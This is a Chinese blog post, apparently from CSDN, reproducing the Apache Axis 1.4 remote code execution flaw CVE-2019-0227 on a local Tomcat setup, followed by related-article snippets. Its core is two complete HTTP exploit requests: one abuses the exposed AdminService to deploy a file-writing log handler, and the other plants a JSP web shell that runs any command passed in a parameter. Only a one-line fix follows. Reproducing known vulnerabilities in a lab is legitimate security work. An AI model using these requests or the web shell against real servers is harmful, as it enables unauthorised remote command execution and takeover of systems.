Apache Axis 1.4 RCE CVE-2019-0227漏洞复现

最新推荐文章于 2024-06-27 16:20:43 发布
最新推荐文章于 2024-06-27 16:20:43 发布
阅读量9.6k 收藏 3
点赞数 1
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43697234/article/details/118977001
版权

Apache Axis 1.4 RCE CVE-2019-0227漏洞复现

漏洞产生原因:
Axis 1.4 adminservice开启远程访问,此时攻击者可通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务

影响范围:Axis <=1.4 且enableRemoteAdmin设置为True
环境搭建:tomcat8.5+apache Axis 1.4 将apache Axis 1.4 下的webapps/axis包放到tomcat目录下webapp下即可。
漏洞复现:
访问页面,放回下述页面即搭建成功
在这里插入图片描述
POC1:开启写文件功能,并指定写入路径(注:在我搭建的环境下,使用相对路径未成功,故使用了绝对路径)

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 1063

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns1:deployment
  xmlns="http://xml.apache.org/axis/wsdd/"
  xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
  xmlns:ns1="http://xml.apache.org/axis/wsdd/">
  <ns1:service name="RandomService" provider="java:RPC">
    <requestFlow>
      <handler type="RandomLog"/>
    </requestFlow>
    <ns1:parameter name="className" value="java.util.Random"/>
    <ns1:parameter name="allowedMethods" value="*"/>
  </ns1:service>
  <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >  
    <parameter name="LogHandler.fileName" value="/PATH " />   #相对路径未成功,绝对路径成功。
    <parameter name="LogHandler.writeToConsole" value="false" /> 
  </handler>
</ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述
POC2:在poc1路径下写入jsp码

POST /axis/services/RandomService HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 878

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述

访问文件,并通过参数传值,查询whoami
在这里插入图片描述
修复建议:
开启远程访问需要将axis/WEB-INF/server-config.wsdd里enableRemoteAdmin设置为False,允许远程admin服务

Sh1ro4
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
Axis1.4开发webService中遇到的问题及解决方案
狮子心2012的专栏
06-05 3813
1. 工程中设置代理问题 需求中遇到
某通用流程化管控平台编辑器SSRF到axisRCE之旅1
08-03
有了 session,我们只需要找到在线的 session 然后替换我们当前的 seesionID 可某通流程化管控平台编辑器SSRF到axisRCE之旅有了
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行(RCE)POC
06-06
xml 执行java源码 Axis <=1.4 远程命令执行(RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地环境可以不管) 本人部署在tomcat8上 利用 第一步: 通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务。这里我们要写入的文件名是../webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,也就是tomcat默认根目录。 POST /axis/services/AdminService HTTP/1.1 Host: localhost:8080 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
weixin_50464560的博客
11-11 6297
webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,我们默认IP+port访问的就是ROOT目录,也就是tomcat默认根目录。调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。
网络安全最全Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞(1),2024年最新你连原理都还没弄明白
2401_84302761的博客
05-09 494
中找到 lib/resty/jwt.lua 文件,在 jwt.lua 文件的 782 行中,可以看到有个 jwt_obj.reason 中包含了 secret,这里代码的意思是说,如果程序执行正常就返回 secret 的值,否则就返回具体的异常信息。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
Apache Axis 远程代码执行(CVE-2019-0227)
酷狗直播-锦凡歆的博客
06-18 4477
 1、基本情况   Apache Axis存在一个远程代码执行漏洞CVE编号:CVE-2019-0227。   2、攻击原理   Axis附带的默认服务StockQuoteService.jws包含一个硬编码的HTTP URL,可用于触发HTTP请求。攻击者可以通过域名(www.xmltoday.com)接管或者通过ARP欺骗服务器从而执行MITM攻击,并将HTTP请求重定向到恶意W...
oracle漏洞poc,Apache Axis 1.4 远程代码执行漏洞(CVE-2019-0227)附PoC
weixin_42107165的博客
04-14 826
漏洞编号和级别CVE编号:CVE-2019-0227,危险级别:高危,CVSS分值:官方未评定受影响的版本Apache Axis Version = 1.4不受影响版本Apache Axis2 所有版本(目前暂时没有发现Axis2的服务存在外联现象)漏洞概述Apache Axis是美国阿帕奇(Apache)软件基金会的一个开源、基于XML的Web服务架构。该产品包含了Java和C++语言实现的SO...
CVE-2019-0227漏洞分析资料
最新发布
xillianpeng的专栏
06-27 94
阿里云漏洞库https://xz.aliyun.com/t/5513Apache Axis 1.4 RCE CVE-2019-0227漏洞复现-CSDN博客
使用Apache AXIS 1.4开发Web服务:小试牛刀
大龙谈智能内容
07-01 4389
使用Apache AXIS 1.4开发Web服务:小试牛刀试验目的:使用Apache AXIS 1.4开发最简单的Web服务程序   前提:操作系统:windows 2000/XP/2003 在进行此试验前,需要先建立Java试验环境,如果你还没有建立实验环境,请参考我的上一篇文章:建立Java试验环境   基础知识及AXIS简介:Apache
Apache AXIS 1.4 RCE
公众号shadow sock7
06-17 3010
复现下载1.4版本: https://mirrors.tuna.tsinghua.edu.cn/apache/axis/axis/java/1.4/axis-bin-1_4.tar.gz 安装参考: https://axis.apache.org/axis/java/install.html
web service axis1.4 jar
03-08
web service axis1.4所有的jar
AXIS1.4webservice服务端和客户端例子
10-09
基于AXIS1.4实现的webservice客户端和服务端的搭建例子。里面包括完整的服务端demo和客户端demo并附有文档教程
axis-bin-1_4.zip_Axis1.4-bin_axis 1.4_axis-1_4.rar_axis-bin-_axi
09-24
在标题和描述中提到的"axis-bin-1_4.zip"和"Axis1.4-bin"是指 Axis 1.4 的二进制发行版,这个版本的AXIS包含了运行和开发Web服务所需的所有必要组件。"axis-1_4.rar"可能是同一版本的另一种压缩格式,而"axis-bin-_...
axis1.4完整包下载
03-07
标题“axis1.4完整包下载”表明我们关注的是Apache Axis1.4版本,这是一个较早但仍然在某些环境中使用的版本。 在描述中提到,“包含Axis1.4的所有完整包”,这意味着下载包中包含了运行和开发SOAP Web服务所需的...
apache axis1.4实例
06-02
Apache Axis1.4Apache软件基金会开发的一个开源Web服务框架,专门用于构建和部署Web服务。这个框架在2004年发布,虽然现在已经有些老旧,但因其稳定性、广泛支持和丰富的功能,仍然在很多项目中被使用。本文将深入...
springboot+axis1.4
05-22
Axis1.4Apache软件基金会的一个开源项目,它提供了一个SOAP(简单对象访问协议)Web服务框架,用于创建和部署Web服务。 当我们需要在Spring Boot项目中集成Axis1.4来实现Web服务时,我们需要了解以下几个关键...
java 远程执行linux命令_Axis1.4 远程命令执行(CVE20190227)复现
weixin_39618456的博客
11-29 106
一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏...
CVE-2019-0227: Remote Code Execution in Apache Axis
weixin_30693183的博客
04-10 335
原文:https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/ poc: https://github.com/RhinoSecurityLabs/CVEs/blob/master/CVE-2019-0227/CVE-2019-0227.py 转载于:h...
axis2-adb-1.4.1.jar坐标
05-15
axis2-adb-1.4.1.jar是一个轴心2(Axis2)的模块。Axis2是一个基于Java的Web服务框架,它是Apache Software Foundation的一个项目。axis2-adb-1.4.1.jar主要提供了一种通过自动生成代码来实现“XML绑定”的方法,从而使得开发人员可以更加方便地处理XML文档。 在Maven中,可以通过以下坐标来引用axis2-adb-1.4.1.jar: <dependency> <groupId>org.apache.axis2</groupId> <artifactId>axis2-adb</artifactId> <version>1.4.1</version> </dependency> 其中,groupId表示框架组织的ID,artifactId表示框架的名称,version表示框架的版本号。通过这些坐标,Maven会自动下载并引用axis2-adb-1.4.1.jar。 需要注意的是,由于axis2-adb-1.4.1.jar是一个轴心2的模块,所以在使用之前,需要先引入轴心2的核心模块,即axis2-kernel.jar。同时,也需要根据具体的需求选择和引入其他的axis2模块。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值